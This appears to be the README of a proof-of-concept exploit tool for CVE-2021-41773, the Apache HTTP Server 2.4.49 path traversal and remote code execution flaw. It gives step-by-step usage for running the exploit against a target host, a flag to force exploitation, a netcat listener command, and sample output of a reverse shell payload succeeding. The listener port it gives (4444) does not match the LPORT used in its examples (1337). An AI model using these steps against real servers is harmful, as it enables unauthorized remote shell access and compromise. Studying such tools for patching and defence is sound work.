CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal & RCE

📖 Description

This is a proof-of-concept exploit for CVE-2021-41773, a path traversal and remote code execution vulnerability in Apache HTTP Server 2.4.49.

Vulnerability Details

• CVE: CVE-2021-41773
• Affected Version: Apache HTTP Server 2.4.49
• Vulnerability Type: Path Traversal → Remote Code Execution

🚀 Usage

Installation

git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests

Basic Usage

# Basic syntax
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>

# Force exploitation even if vulnerability check fails
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f

Example

# Basic syntax
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

# Force exploitation even if vulnerability check fails
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f

Setup Listener

Before running the exploit, set up a netcat listener:

nc -lvnp 4444

Expected Output

$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

     ______
    (_____ \
     _____) ) _ _ ____   ____ ___   ____
    |  ____/ | | |  _ \ / ___) _ \ / _  |
    | |    | | | | | | | |  | |_| ( (_| |
    |_|     \___/|_| |_|_|   \___/ \___ |
                                  (_____|

       Apache2 2.4.49 - CVE-2021-41773

   
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener